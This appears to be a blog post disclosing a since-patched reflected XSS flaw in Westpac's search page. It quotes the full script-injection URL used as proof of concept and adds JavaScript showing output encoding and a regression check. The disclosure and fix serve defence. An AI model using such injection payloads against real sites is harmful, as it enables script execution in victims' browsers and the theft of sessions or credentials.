Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say, the smell of an XSS casualty brings the zombies around.
The hole has been patched by Westpac now. The URL was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0
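The post does not say how the field was patched. As an added example (not Westpac's code or the author's), this sketch shows one standard fix, encoding the reflected query at output, and uses the URL above as a regression input. All function names are hypothetical.

```javascript
// Added example: reflecting a search term safely. Function names are hypothetical.

// The URL quoted in the post (already patched), used only as test input.
const REPORTED_URL =
  "http://search.westpac.com.au/search/search.cgi?collection=westpac&query=" +
  "%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32," +
  "109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0";

// Encode the characters that can change parsing context in HTML text
// and in quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Before: the query is concatenated into the results page as-is.
function renderResultsUnsafe(query) {
  return `<p>Results for: ${query}</p><input name="query" value="${query}">`;
}

// After: the query is encoded at the point of output.
function renderResultsSafe(query) {
  const q = escapeHtml(query);
  return `<p>Results for: ${q}</p><input name="query" value="${q}">`;
}

// Extract and percent-decode the "query" parameter, as the server would.
function queryFrom(url) {
  return new URL(url).searchParams.get("query") ?? "";
}

// Regression check: does markup from the query survive verbatim into the page?
function reflectsMarkup(html, query) {
  return /[<>"']/.test(query) && html.includes(query);
}

const query = queryFrom(REPORTED_URL);
console.log("unsafe reflects markup:", reflectsMarkup(renderResultsUnsafe(query), query));
console.log("safe reflects markup:  ", reflectsMarkup(renderResultsSafe(query), query));
console.log(renderResultsSafe(query));
```

The same `reflectsMarkup` check can be run against every parameter a search page echoes back, including the value written into the search box itself.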